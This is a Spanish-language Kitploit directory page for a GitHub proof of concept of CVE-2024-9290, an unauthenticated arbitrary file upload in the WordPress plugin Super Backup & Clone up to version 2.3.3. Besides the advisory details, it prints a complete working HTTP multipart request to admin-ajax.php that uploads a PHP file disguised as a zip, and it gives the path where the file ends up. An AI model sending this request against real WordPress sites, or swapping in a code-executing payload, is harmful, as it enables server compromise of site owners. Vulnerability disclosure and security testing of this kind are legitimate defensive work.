Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-9290 — Super Backup & Clone - Migrate for WordPress <= 2.3.3 - Carga de archivos arbitraria no autenticada | Kitploit
Herramientas/GitHubGitHub/randomrobbiebf/cve-2024-9290
Análisis de VulnerabilidadesAnálisis de CódigoExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónDesarrollo de Payloads
GitHubrandomrobbiebf/cve-2024-9290

CVE-2024-9290

Super Backup & Clone - Migrate for WordPress <= 2.3.3 - Carga de archivos arbitraria no autenticada

Ver Repositorio
hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-9290

Super Backup & Clone - Migrate for WordPress <= 2.3.3 - Carga arbitraria de archivos no autenticada

Descripción

El plugin Super Backup & Clone - Migrate for WordPress para WordPress es vulnerable a la carga arbitraria de archivos debido a la falta de validación del tipo de archivo y a la ausencia de una comprobación de capacidades en la función ibk_restore_migrate_check() en todas las versiones hasta la 2.3.3 inclusive. Esto permite que atacantes no autenticados suban archivos arbitrarios en el servidor del sitio afectado, lo que puede posibilitar la ejecución remota de código.

Detalles

  • Tipo: plugin
  • Slug: indeed-wp-superbackup
  • Versión afectada: 2.3.3
  • Puntuación CVSS: 9.8
  • Clasificación CVSS: Crítico
  • Vector CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • CVE: CVE-2024-9290
  • Estado: Privado

POC

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/2
Host: wp-dev.ddev.site
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:133.0) Gecko/20100101 Firefox/133.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://wp-dev.ddev.site/wp-admin/admin.php?page=ibk_admin&tab=restore
Content-Type: multipart/form-data; boundary=---------------------------12986918151631900204175958232
Content-Length: 793
Origin: https://wp-dev.ddev.site
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

-----------------------------12986918151631900204175958232
Content-Disposition: form-data; name="ibk_restore_migrate_action"

1
-----------------------------12986918151631900204175958232
Content-Disposition: form-data; name="restore_type"

restore_file
-----------------------------12986918151631900204175958232
Content-Disposition: form-data; name="restore_url"


-----------------------------12986918151631900204175958232
Content-Disposition: form-data; name="upload_file"; filename="info.php"
Content-Type: application/zip

<?php phpinfo(); ?>
-----------------------------12986918151631900204175958232--

Dónde encontrar

Se sube a https://wp-dev.ddev.site/wp-content/uploads/isnapshots/info.php

Descargar herramienta